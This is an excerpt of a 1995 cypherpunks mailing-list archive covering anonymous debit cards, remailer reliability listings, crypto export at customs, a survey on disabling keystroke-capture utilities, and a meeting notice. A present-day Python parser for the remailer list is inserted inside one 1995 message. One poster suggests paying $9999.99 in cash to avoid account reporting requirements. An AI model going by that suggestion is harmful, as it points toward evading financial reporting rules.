to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
should all arrange to take the same flight, while carrying some bit of
approved-for-export material.  Should drive the Customs guys
completely nuts.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 01:02:15 PST
To: cypherpunks@toad.com
Subject: Anonymous payment scheme
Message-ID: <qbx1lKjqRC$2075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This idea just popped into my head, just as I was about to fall asleep.
Being the idiot that I am, I had to get up to write it down. This idea has
probably been presented before...but I haven't seen it here yet.

Let's suppose myself and 10,000 of my closest friends form the First
National Cypherpunk Bank and Trust. We go through all of the hassles in
order to be the issuer of a Master Card or Visa. Now instead of having a
credit line, it is set up as a debit card. The card's limit is how ever
much you have prepaid the bank in advance. Once you have hit your prepaid
amount the card no longer gets approved. Now because everything is prepaid,
there is no risk to me, so I'll put any name you want on the card. The
questions I have are:

Is this legal in the U.S.?

If so, is anyone doing it?

If it's not legal in the U.S., is it legal anyplace else?

If this is a gray area, why wouldn't this scheme work?

If this scheme was set up, it appears to me that the infrastructure for
anonymous payments/netcash is already in place. Of course the issuer would
get a healthy fee for issuing the card...but then again, there truly is
no such thing as a free lunch. As my 10,000 friends and I have no plans to
set this up, feel free to pick it apart at will. (which I'm sure it will
be)

Sam

==============================================================================

There is an order of things in this universe.
                -- Apollo, "Who Mourns for Adonais?" stardate 3468.1

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Sun, 1 Jan 95 19:48:12 PST
To: cypherpunks@toad.com
Subject: cnonymity, law and order
Message-ID: <9501020251.AA27454@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I want to publicly thank John Young for making articles available.  Most of 
those articles I would not otherwise have seen.  

I was particularly interested in Peter Lewis's article from the New York Times 
that John offered.  Was there anyone in the world, well, in the cyberworld, who 
was fooled by the article on the Microsoft acquisition of the Catholic church?  
Anyone, who after reading that piece, considered anything other than the 
creativity of the author, should be committed to St. John's Home for the 
Desperately Dumb.  

However, there was something in that article that was of concern.  If the 
Massachusetts judge in the MIT student case actually said that he couldn't act 
because Congress had not enacted any laws, then it is for sure they will try to 
and they will try to act hurriedly.  Hurried actions by congress are even worse 
than their considered actions.  I think we need to keep in touch with our 
representatives and senators to make sure that all of the ramifications of any 
law are considered.  Sometimes laws passed by Congress are rather well 
intentioned, but the bureaucrats who write the policies and procedures by which 
the laws will be implemented can make them an albatross around our necks.  
These policy and procedure writers are dreadfully misinformed and are too 
enamored with their power and position to inform themselves.  

Admittedly, anonymity and law and order are not easy bed fellows, but difficult 
issues are never solved by hurried, uninformed, politically-motivated action.  
This puts some pressure on us cypherpunks.  We have to be ready to consider all 
aspects of the argument so that our presentation in favor of anonymity will be 
taken seriously.  







-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 02:17:01 PST
To: werewolf@io.org
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.BSI.3.91.950102041835.6592B-100000@wink.io.org>
Message-ID: <Jpy1lKjqRWH1075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Let's suppose myself and 10,000 of my closest friends form the First
> > National Cypherpunk Bank and Trust. We go through all of the hassles in
> > order to be the issuer of a Master Card or Visa. Now instead of having a
> > credit line, it is set up as a debit card. The card's limit is how ever
>
>
> Why jump through the hoops Visa or M/C would send you through if it's a DEBIT
> card??? You don't need them for something like that, simply the
> acceptance of the Internet community, that credits from another user
> drawn on the Cypherpunk Bank would be accepted.....which leads to your next
> paragraph...

I was looking at the bigger picture. Any merchant who accepts Visa or MC
could now accept anonymous payments. No hassle at all on their part. They
probably wouldn't even know that it was an anonymous account. It fits into
the existing infrastructure very nicely.

A bank in Minneapolis has a similar system in operation. They issue you a
Visa card. That card automatically debits your checking account. The key
would be not to have the card attached to the account. If the card is
attached to any type of account, then there are reporting requirements. A
more apt analogy would be the prepaid phone cards. Walk into the issuing
authority, plunk your $9999.99 on the counter and ask for your card. When
you've spent it all, toss the card.

Sam
==============================================================================

Marriage is like a cage; one sees the birds outside desperate to get in,
and those inside equally desperate to get out.
                         - Michel Eyquem de Montaigne

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Terka <werewolf@io.org>
Date: Mon, 2 Jan 95 01:46:07 PST
To: Samuel Kaplin <skaplin@skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <qbx1lKjqRC$2075yn@skypoint.com>
Message-ID: <Pine.BSI.3.91.950102041835.6592B-100000@wink.io.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995, Samuel Kaplin wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> This idea just popped into my head, just as I was about to fall asleep.
> Being the idiot that I am, I had to get up to write it down. This idea has

....best time for ideas....between sleep and wakefulness.....:>


> 
> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever


Why jump through the hoops Visa or M/C would send you through if it's a DEBIT
card??? You don't need them for something like that, simply the 
acceptance of the Internet community, that credits from another user 
drawn on the Cypherpunk Bank would be accepted.....which leads to your next
paragraph...

> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:

Sounds good.....and practical. ANY citizen in the world deposits with your
"Bank" legal tender in an account. US dollars would likely fit the bill as
they are pretty well accepted from North America to North Korea (black market
maybe.....but still accepted :>).

Then, when someone presents to your Bank proof of purchase/transfer etc
(a digitally signed message with your PGP Key perhaps?) then you transfer
a dollar figure from one account to another ...... assuming both purchaser
and seller have accounts at the Cypherpunk Bank.

If the purchaser does.....but the SELLER doesn't, then (if so desired by
the seller) you have three choices:

   1) open an account, f/o (favour of.....sorry....I'm a Banker so pardon
      my lapsing now and again into our jargon) of the seller, transferring
      in the requisite amount of US $ for the seller's later use (ie...
      then HE goes out and buys something over the 'Net).

   2) wire to the seller's account (overseas?) through a correspondent bank
      to the seller's bank where he has an account the US $.

   3) mail a draft in the appropriate US $ to the seller's designated address
      .....either snail mail or Fed Express, or whatever courier is selected.

> Is this legal in the U.S.?

Dunno....I'm in Canada. But I know that U.S. banking arrangements are
medieval so I doubt it.

> If so, is anyone doing it?

See above :>

> If it's not legal in the U.S., is it legal anyplace else?

Sure.....Canada right now has a fully operational debit card system in place.
You go to a supplier to make a purchase and they run your bank card through
a machine just like your credit card for the purchase. Difference being, $$$
from your chequing account are debited, as opposed to the line of credit
on your credit card being debited. You have dollars in the bank 
sufficient for the purchase, then no problem.


> If this is a gray area, why wouldn't this scheme work?

It's a perfectly workable scheme....IF...the BANK in question is trusted as
the medium of exchange. That's the ONLY thing stopping its implementation,
namely having a trusted institution to handle the deposits/transfers.

Let's put it this way, I think the scheme would have A LOT more acceptance if
you as a seller presented your invoice for settlement at Chase Manhattan or
Bank of Montreal as opposed to the Cypherpunk Bank :>. 

> If this scheme was set up, it appears to me that the infrastructure for
> anonymous payments/netcash is already in place. Of course the issuer would

Sure it is....co-ordinating the infrastructure would be interesting, but 
doable. The main thing is....is it economically viable for the institution
in question? Would there be enough commerce done over the 'Net to justify
implementation of the supporting infrastructure (ie Internet hook-up's,
training of staff, etc).

Once there exists a demand for the service, coupled with a reasonable rate
of return to the Bank for provision of the service, then you'll see ALL
the top 20 banks in the world do it.

Until then, nobody will do it simply because the Cypherpunks think it is
a good idea. :>


<Sorry guys...I answered this online so no PGP sig this time.....>



--------------------------------------------------------------------------
Mark Terka     | werewolf@io.org             | public key (werewolf) by
Toronto,Canada | dg507@cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 2 Jan 95 05:45:01 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Jpy1lKjqRWH1075yn@skypoint.com>
Message-ID: <199501021344.FAA11566@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: skaplin@skypoint.com (Samuel Kaplin)

   I was looking at the bigger picture. Any merchant who accepts Visa or MC
   could now accept anonymous payments. No hassle at all on their part. 
   [...]
   The key
   would be not to have the card attached to the account. If the card is
   attached to any type of account, then there are reporting requirements. 

Visa was talking about an electronic traveller's check, which, from
what I could tell, instantiated an account in the sum of the value of
the card purchased, which was then drawn down by purchase.  The card,
evidently, had no embossing on it.  Personalization was limited to
some account id which would last the lifetime of the balance and then
disappear.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Jan 95 06:49:15 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501021450.GAA02030@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"jpunix"} = "<remailer@jpunix.com> cpunk pgp hash latent cut post ek";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 2 Jan 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nately   remailer@nately.ucsd.edu         +++++++++++*    32:53  99.99%
mix      mixmaster@nately.ucsd.edu        +++++++++-+     41:39  99.99%
rahul    homer@rahul.net                  --***#***#**     9:40  99.98%
penet    anon@anon.penet.fi               ********+***    26:09  99.99%
vox      remail@vox.xs4all.nl             .-..-------  12:53:05  99.99%
soda     remailer@csua.berkeley.edu       .-.._-.-..    8:50:49  99.67%
usura    usura@replay.com                 *****+- -- *    22:53  99.33%
flame    tomaz@flame.sinet.org            **  *-*-*-**    32:52  99.09%
jpunix   remailer@jpunix.com              **  *-#-*-**    32:26  99.06%
c2       remail@c2.org                    --__.-+*--**  2:50:57  98.95%
rebma    remailer@rebma.mn.org            ---*----*     7:52:32  99.27%
ideath   remailer@ideath.goldenbear.com   ++* ++**  -   2:09:26  98.05%
bsu-cs   nowhere@bsu-cs.bsu.edu           +*  --#+##**  1:40:45  96.01%
q        q@c2.org                         --_   . --+   6:03:15  92.56%
alumni   hal@alumni.caltech.edu           *****#*++ *-    27:00  89.60%
portal   hfinney@shell.portal.com         #*#**#*** *-    21:31  89.60%
extropia remail@extropia.wimsey.com       +.-+* +++    12:38:44  77.66%
xs4all   remailer@xs4all.nl                ***   *--      20:22  75.57%
desert   remail@desert.xs4all.nl          ----____.--  40:43:30  71.96%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien
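
The listing above is machine-readable in both parts. The following Python sketch is an added example (not premail's code and not part of Raph Levien's message): it parses the `$remailer{...}` option lines and the ping table, then picks remailers by required options and uptime. The names `Remailer`, `load` and `select` are hypothetical, the embedded lines are a five-remailer excerpt of the listing, and reading the latency column as `[h:]mm:ss` is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Excerpt of the listing above, embedded so the example runs offline.
CAPS = '''\
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"jpunix"} = "<remailer@jpunix.com> cpunk pgp hash latent cut post ek";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
'''
STATS = '''\
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
penet    anon@anon.penet.fi               ********+***    26:09  99.99%
vox      remail@vox.xs4all.nl             .-..-------  12:53:05  99.99%
jpunix   remailer@jpunix.com              **  *-#-*-**    32:26  99.06%
c2       remail@c2.org                    --__.-+*--**  2:50:57  98.95%
xs4all   remailer@xs4all.nl                ***   *--      20:22  75.57%
'''

# Header each remailer class expects, as given under "Options and features".
HEADER_BY_CLASS = {"cpunk": "Request-Remailing-To",
                   "eric": "Anon-Send-To",
                   "penet": "X-Anon-To"}

CAP_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')
# The history column may contain spaces, so anchor on the two trailing fields.
STAT_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+(?:\.\d+)?)%$')


@dataclass
class Remailer:
    name: str
    address: str
    options: set
    pgp_key_id: Optional[str]      # key ID to encrypt to, None if no PGP support
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None

    @property
    def header(self):
        """Remailing header for this remailer's class, or None if unknown."""
        for cls, hdr in HEADER_BY_CLASS.items():
            if cls in self.options:
                return hdr
        return None


def latency_seconds(text):
    """Convert 'mm:ss' or 'h:mm:ss' (assumed reading of the column) to seconds."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs


def load(caps, stats):
    """Parse both parts of the listing into {short name: Remailer}."""
    remailers = {}
    for line in caps.splitlines():
        m = CAP_RE.match(line.strip())
        if not m:                   # e.g. the "is _not_ a remailer" notice
            continue
        name, address, opts = m.groups()
        options, key_id = set(), None
        for tok in opts.split():
            if tok == "pgp.":       # trailing period: key ID is the short name
                options.add("pgp")
                key_id = name
            else:
                options.add(tok)
                if tok == "pgp":    # plain pgp: key ID is the full address
                    key_id = address
        remailers[name] = Remailer(name, address, options, key_id)
    for line in stats.splitlines():
        m = STAT_RE.match(line.rstrip())
        if not m or m.group(1) not in remailers:
            continue                # header, rule, or unknown remailer
        r = remailers[m.group(1)]
        if m.group(2) != r.address:
            continue                # the two parts disagree: ignore the stats row
        r.history = m.group(3)
        r.latency_s = latency_seconds(m.group(4))
        r.uptime = float(m.group(5))
    return remailers


def select(remailers, need, min_uptime):
    """Names of remailers with all options in `need` and uptime >= min_uptime,
    fastest average latency first."""
    ok = [r for r in remailers.values()
          if need <= r.options and r.uptime is not None and r.uptime >= min_uptime]
    return [r.name for r in sorted(ok, key=lambda r: r.latency_s)]


if __name__ == "__main__":
    table = load(CAPS, STATS)
    for name in select(table, {"pgp"}, 98.0):
        r = table[name]
        print(name, r.header, r.pgp_key_id, r.latency_s, r.uptime)
```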




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 2 Jan 95 06:36:02 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID: <199501021422.JAA00361@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules. 
> 
> I can think of at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material.  Should drive the Customs guys
> completely nuts.

Actually, those of us who are going should arrange to take *separate*
flights...  My reading of Matt's message said that most of the time
was spent trying to figure out what to do, and only a little time was
spent actually doing it.  If a bunch of people all take the same
flight, it will take them only a slight bit longer to process the
whole bunch of you than if one person on the flight was doing it...

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Mon, 2 Jan 95 09:25:20 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501021725.AA09061@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


Matt has a good story, and the lesson that he draws, that presently the
average person can't follow the rules, seems valid.  But I don't see the
point of the proposals to replicate his experiment.

Doesn't Matt's experience really show simply that not enough people try
to follow the rules, so the agencies aren't set up yet to make it
easy?  Is it our goal to change this, to get Customs to streamline
their operation so that everyone really does register their crypto
equipment on travels overseas?  It seems to me we are better off with
the present informal system where you can actually use crypto overseas
without worrying much.

I could see a system where you routinely fill out and have your card
stamped when you check your luggage to show that you are carrying crypto.
Then you turn it in when you come back.  This might not be too different
from what you do now when you declare items you are taking out and
bringing back to show they are free of customs duties.  How does this
advance the CP cause?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Mon, 2 Jan 95 07:27:25 PST
To: cypherpunks@toad.com
Subject: exponential relationship of crytographer and cryptanalyst
Message-ID: <Pine.3.89.9501021008.A20482-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


-	I'm writing a piece on the politics of surveillance/privacy 
technologies for OMNI, essentially a survey of their advance since the 
1967 proposal for the National Data Center. I cover cryptography, 
deriving the narrative from Clipper Chip initiative. The point I'm trying 
to make is that given the market forces pushing commerce onto the public 
networks and the increasing power of available encryption, the cold war 
national apparatus will have to mobilize quickly a la digital telephony 
to stomp it - yet the nature of computing puts them in a losing position 
in the long run. Toward the latter part of this thesis, I've been told - 
and want to check with youz - of the exponential relationship of 
cryptographer and cryptanalyst. The heart of this relationship has been 
explained to me as follows: Increasing the key by one bit effectively 
doubles the number of keys and proportionally increases the power 
required to break it in a brute force attack. Is this true? Is there a 
truer way of stating it? Are there complicating factors this excludes 
that I should discuss?
-				Regards,

-					Peter Cassidy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 2 Jan 95 11:03:09 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <v01510103ab2d756f56fa@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:

>Let's suppose myself and 10,000 of my closest friends form the First
>National Cypherpunk Bank and Trust. We go through all of the hassles in
>order to be the issuer of a Master Card or Visa. Now instead of having a
>credit line, it is set up as a debit card. The card's limit is how ever
>much you have prepaid the bank in advance. Once you have hit your prepaid
>amount the card no longer gets approved. Now because everything is prepaid,
>there is no risk to me, so I'll put any name you want on the card. The
>questions I have are:
>
>Is this legal in the U.S.?
>
>If so, is anyone doing it?

This type of card is issued with just about every checking account in
Oregon. I don't know about other states, except that here in California I
know of only two that are doing it: Charles Schwab and Glendale Federal.
There may be more, but I have yet to hear about them. In Oregon you get
such an ATM/Visa card instead of your regular ATM card. Good credit, bad
credit, no credit. Now if I could just remember what it's called...


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Mon, 2 Jan 95 12:17:47 PST
To: jRT <jrt@asiaonline.net>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.3.89.9501030049.A16477-0100000@asiaonline.net>
Message-ID: <Pine.NXT.3.91.950102120713.12977A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, jRT wrote:

> 
> Well, I know some shops have so called 'switch' or 'smart' cards to debit 
> your account, some of these are on their own credit line, others are not.
> 
> I have an account with a bank in Britain which gives me a "VISA" Card 
> which is actually a 'direct-debit' card.  I can use it (and have) all 
> around the world as a regular VISA card and in any 'VISA compatible' ATM.

  A lot of the banks in the US are now offering these cards for use with 
checking accounts.

> 
> As soon as my balance drops to zero, I can no longer use it.  And when I 
> do, the money jumps out of my account immediately and can no longer be used.
> 
> This is a bank-issued card, and also acts as my ATM card to access my 
> current account - there is NO charge for this.  I'm not sure exactly how 
> that works.

  When a charge is made to the card it is subtracted from the balance 
until midnight? of that night. If the actual charge does not come in to 
the bank, the amount is then added back to the balance. (This was learned 
thru my GF who had some trouble with her card -- forgot to write down a 
couple of transactions and ended up at zero).

> 
> Whether or not VISA would accept a proposal from First National 
> Cyberphunks or not remains to be seen...

  I think they should. If they would is another matter. It would be 
similar to having a 'secret' Swiss bank account that can be accessed from 
anywhere in the world, converted to cash at cash machines, transferred to 
others, etc.

  I like the idea of an anonymous Visa better than some sort of new 
net-bank because it is already established, the mechanism for transfer is 
already in place, and for the most part de-bugged.

  If there was an Anonymous Visa debit card I'd definitely go for it. It 
would certainly keep those marketing types from tracking my spending 
patterns.

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KEY-CAPTURE@lsd.com (Dave Del Torto)
Date: Mon, 2 Jan 95 13:00:53 PST
To: Key_Capture_Survey@lsd.com
Subject: RFC: Key Capture Utility Survey
Message-ID: <ab2dba2f01021003d685@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain



               REQUEST FOR COMMENTS ON KEY CAPTURE UTILITIES
               ---------------------------------------------

Key capture utilities present a serious threat to the security of passwords
on individual and networked computing systems, especially when novice users
are unaware of their presence. Well-educated users and administrators help
make all systems on and off the Internet more reliably safe for everyone's
data.

If you are a:

 -- privacy, system security or cryptography advocate/activist
 -- network admin concerned with the password-hygiene of your users or
 -- computing professional with an appreciation of good security,

then please complete and return this quick survey. By contributing to the
knowledgebase on the subject of password protection, you can help educate
yourself and many novice/intermediate users about a common weakness --
utilities that may capture their keystrokes unseen as they enter their
*password* -- in ALL secured systems (a user's encryption app, your network
or its dial-in access, your company's email system or database fileserver,
etc.).

The intent here is to create a *central list of all key-capture utilities*
which will help people to at least be aware of their existence or operation
on a given system and describe in simple terms how to disable the utility.

The results of the survey will be tabulated and put in the public domain on
the Internet. If your reply is included, your name will be acknowledged in
the resulting document, which will be: part of the new "Beginner's PGP FAQ"
for new users of the PGP (Pretty Good Privacy) application; a msg posted on
various Internet lists and online services and; a text file available by
anonymous FTP as:

   ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/key_cap_util.txt

Please forward this survey to anyone you think can/will help - and thanks
in advance for your contribution!

_______________________________
THE KEY CAPTURE UTILITY SURVEY:

The survey is very easy to participate in. Just send as much information as
you can, even if you're only partially able to complete the form. Every
piece of information that can lead us to the utility - even just a fragment
of a name and an email address of someone who might know more about it -
will help us compile a fairly exhaustive list. To assist us in easily
tabulating the incoming mail on this topic, please send your reply to:

 -- <KEY-CAPTURE@lsd.com>
 -- Format your answer as follows:


******* PLEASE RETURN ONLY THIS INFORMATION *******

      TO: KEY-CAPTURE@lsd.com
    SUBJ: PLATFORM/Utility Name
MSG BODY:
 [1] OPERATING-SYS                <--- i.e. WIN/DOS/MAC/OS2/UNIX, etc.
 [2] "Utility-Name" (utility-package-name, if not a stand-alone product)
 [3] Developer-Name (company-individual)
 [4] <developer-email-address>
 [5] Type                         <--- i.e.: system extension, autoexec, TSR
 [6] Path-to-file-location-when-loaded.
 [7] How to disable the utility's key capturing operations (step-by-step if
     possible). Please be brief, but aim for a novice level user. If disabling
     the key capturing is too complex to describe easily, then just explain
     what the user should ask a sys admin to do for them (while they watch, if
     applicable).
***************************************************



(Here's an Example:)
    SUBJ: MAC/Now Save
MSG BODY:
 [1] MAC
 [2] "Now Save" (Now Utilities v5.x), "NowSave" (Now Utilities v4.x)
 [3] Now Software, Inc.
 [4] <support@nowmail.nowsoft.com>
 [5] System extension/Control Panel device (CDEV)
 [6] [startup HD]:System Folder:Control Panels:Now Save (or :NowSave)
 [7] How to Disable:

     Open the "NowSave" (v4.x) or "Now Save" (v5.x) Control Panel.

     v4.x: Click the "Preferences" button.
           Click the "Key Capture..." button.
           Click the "OFF" radio button      (upper right corner of dialog).
           Click the "OK" button.

     v5.0: Click the "Key Capture..." button in the button-bar.
           Click the "OFF" radio button (in upper right corner of dialog).
           Click the "OK" button.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 2 Jan 95 13:04:22 PST
To: cypherpunks@toad.com
Subject: Reminder: January 14th "Tools Demo Day" Meeting
Message-ID: <199501022104.NAA01913@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is a reminder that the January 14th "Tools Demo Day" meeting is
coming up, standard place and time at the Silicon Graphics building in
Mountain View, CA.

I described this several weeks back and asked for folks interested in
demonstrating any sort of software tools, crypto code, languages,
etc., to get in contact with me. One person, Henry Strickland
(Strick), has done so. In any case, the meeting will go on.

I'll have my PowerMac 7100 there, and will demo some things like
Mathematica, SmalltalkAgents, MacPGP, etc. 

An SGI Unix box is of course available. An Intel box running something
of interest will presumably be brought by someone.

Anyone planning to demo something should either plan to run on a
machine they know will be there, or bring their own. 

A video projector is sometimes usable, and I plan to bring my video
camera. The idea is that laptops and other non-video out systems can
still be seen by lots of folks. (Someone mentioned also that an LCD
projector may be available.)

The normal meeting time is 12-5, but people usually spend the first
hour shmoozing and eating their burritos, so I plan on starting the
formal meeting at 1 (but don't get there at 1 and _then_ expect to
shmooze/eat for the next hour!). The machines should be ready to go by
1:30 at the latest, so that demos can begin.

If we have a lot of demos--not likely based on current
information--then I'll propose parallel tracks.

